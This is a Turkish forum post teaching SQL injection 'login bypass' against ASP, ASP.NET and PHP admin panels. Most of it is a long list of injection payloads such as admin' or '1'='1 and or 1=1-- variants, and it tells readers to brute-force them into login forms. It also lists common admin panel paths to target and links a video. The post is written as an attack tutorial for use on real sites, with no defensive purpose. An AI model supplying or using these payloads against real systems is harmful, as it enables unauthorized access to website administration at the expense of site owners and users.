View hidden content is available for registered users!
SQL Injection Saldırısı veya "Veritabanı Saldırısı" olarak da bilinen ve halen bir çok site için geçerli olan yönetim panelden "SQL İnjection Saldırısı" yani "Login Bypass Yöntemi" nasıl yapılır, onu anlatacağım.
Genelde Windows sunucularında çalışan Microsoft Web Uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL Veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.
Bu saldırı PHP tabanlı MySQL Veritabanı kullanan siteler içinde geçerlidir. Tabii PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir.
NOT: Ek olarak Kullanıcı’nın Şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelere pek yapılmamaktadır.
SQL Injection Saldırısı’nın en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici (//--+++**) kodlarını yazarak panele giriş yapabilmektir.
Bu saldırıyı aşağıdaki kodları kullanarak Brute Force (Deneme Yanılma Yöntemi) ile yapabilirsiniz.
ASP Siteler için SQL Injection Login Bypass (Türevlerini artırabilirsiniz.)
- or --=-
‘or’1’=’1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin’ --
admin’ #
admin’/*
admin’ or ’1’=’1
admin’ or ’1’=’1’--
admin’ or ’1’=’1’#
admin’ or ’1’=’1’/*
admin’or 1=1 or --=-
admin’ or 1=1
admin’ or 1=1--
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (’1’=’1
admin’) or (’1’=’1’--
admin’) or (’1’=’1’#
admin’) or (’1’=’1’/*
admin’) or ’1’=’1
admin’) or ’1’=’1’--
admin’) or ’1’=’1’#
admin’) or ’1’=’1’/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or --=-
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
Eğer hiçbiri işe yaramadıysa bir de şunları deneyin;
- or true--
-) or true--
-) or (--)=(-
-) or 1--
-) or (’x’)=(-
- or true--
- or --=-
- or 1--
- or "x"=-
-) or true--
-) or (--)=(-
-) or 1--
-) or ("x")=(-
-)) or true--
-)) or ((--))=((-
-)) or 1--
-)) or ((’x’))=((-
---
-+-
-&-
-^-
-*-
- or ----
- or --+-
- or --&-
- or --^-
- or --*-
---
-+-
-&-
-^-
-*-
- or ----
- or --+-
- or --&-
- or --^-
- or --*-
or true--
- or true--
- or true--
-) or true--
-) or true--
- or ’x’=’x
-) or (’x’)=(’x
-)) or ((’x’))=((’x
- or "x"="x
-) or ("x")=("x
-)) or (("x"))=(("x
ASP.NET (.aspx) siteler için Login Bypass kodu;
anything’ OR ’x’=’x
Genelde şu tarz admin panellerinde bulunmaktadır.
Tabii bu yöntem sadece bunlar da denenebilir diyemeyiz.
(Admin Panel türevlerini artırabilirsiniz.)
/admin.asp /login.asp /admin.aspx /login.aspx vs.
Buyrun video:
View hidden content is available for registered users!
Last edited:
